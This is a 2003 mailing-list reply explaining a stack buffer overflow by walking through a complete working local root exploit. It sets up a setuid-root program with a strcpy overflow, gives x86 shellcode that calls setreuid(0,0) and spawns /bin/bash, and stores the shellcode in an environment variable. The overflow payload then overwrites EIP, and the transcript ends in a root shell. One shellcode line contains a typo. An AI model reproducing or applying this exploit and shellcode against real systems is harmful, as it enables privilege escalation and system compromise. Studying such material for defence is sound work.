Re: controlling ebp/eip of a frame, does it always lead to possible code execution?

[Steven Hill <steve () covertsystems org>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Thu, 18 Sep 2003, Ingram wrote:

> hello,
>
> again i have a little question about buffer overflows, 
> that i could not figure out by myself.
>
> If i can control what is written to ebp and eip, i thought
> that this always would be enough to execute shellcode, 
> ...it seems not:
>
> > ./exploit
> Segmentation fault (core dumped)
> > gdb ./myprog ./myprog.core

Ingram,

        Try these sample exploit commandline statements,
        as it should help you better understand what you
        are trying to achieve, then if you prefer, browse 
        over the attached exploit code.

[steve@covertsystems research]#cat > vuln.c <EOF
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
        char buffer[1024];

        if(argc > 1)
                strcpy(buffer, argv[1]);

        return EXIT_SUCCESS;
}
EOF
[steve@covertsystems research]#cat > shell2string.c << EOF
#include <stdio.h>
#include <stdlib.h>

char shell[] =
        //setreuid(0, 0);
        "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80"

        //execve("/bin/bash", NULL)
        "\x31\xc0\x50\x6a\x68\x68\x2f\x62\x61\x73"
        "\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24"
        "\x0c\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80"

        //exit(0);
        "x31\xc0\xb0\x01\xcd\x80";

int main(void)  {

        FILE *fp;
        int x;

        fp = fopen("shell.txt", "wb");
        for(x = 0; x < strlen(shell); x++)
                fprintf(fp, "%c", shell[x]);
        fclose(fp);
        return EXIT_SUCCESS;
}
EOF
[steve@covertsystems research]$ gcc shell2string.c
[steve@covertsystems research]$ ./a.out
[steve@covertsystems research]$ ls -l shell.txt ; wc -c shell.txt
- -rw-rw-r--    1 steve    steve          48 Aug  7 18:32 shell.txt
     48 shell.txt
[steve@covertsystems research]$ od -ch shell.txt
0000000   1 300 260   F   1 333   1 311 315 200   1 300   P   j   h   h
        c031 46b0 db31 c931 80cd c031 6a50 6868
0000020   /   b   a   s   h   /   b   i   n 211 343 215   T   $  \f   P
        622f 7361 2f68 6962 896e 8de3 2454 500c
0000040   S 215  \f   $ 260  \v 315 200   x   3   1 300 260 001 315 200
        8d53 240c 0bb0 80cd 3378 c031 01b0 80cd
0000060
[steve@covertsystems research]# sudo gcc vuln.c -o vuln
[steve@covertsystems research]# sudo chown root.root vuln
[steve@covertsystems research]# sudo chmod 4755 vuln
[steve@covertsystems research]# ls -l vuln
- -rwsr-xr-x    1 root     root        11549 Aug  7 18:30 vuln
[steve@covertsystems research]$ export CODE=`cat shell.txt `
[steve@covertsystems research]$ echo 'main(){printf("%p\n",getenv("CODE"));}'>
code.c ; gcc code.c -o code ; ./code ; rm -rf code*
0xbfffff84
[steve@covertsystems research]$ ./vuln `perl -e '{print "A" x 1036}';``printf 
"\x84\xff\xff\xbf";`
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[root@covertsystems research]# id
uid=0(root) gid=500(steve) groups=500(steve)
[root@covertsystems research]#

Happy Hacking!...

1036 == 1024 + 8[padding] + 4[EBP] +4[EIP]
EIP shall point directly to the shellcode ENV address...


[steve@covertsystems research-1]$ gcc --version
gcc (GCC) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)


- -- 

 ---=[ Covert Systems Research ]=-----------------------------//
 = www.covertsystems.org                                      -
 = Exploit Research & Development                             -
 = Specializing in Linux & UNIX Systems                       -
 --------------------------------------------=[ SolarIce ]=---//

 --The more one reads & learns, the less the other person knows.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQE/apt1+SI9HWArYE4RAkUZAJoDHN4zfMnIqeGohvvjG+rm/MKpzQCdHOqI
qd6e7QwZcCZVOrDuTHo/Hco=
=7uzm
-----END PGP SIGNATURE-----

Attachment: shell2string.c
Description:

Attachment: vuln-1.c
Description:

Attachment: exploit-1-1.c
Description: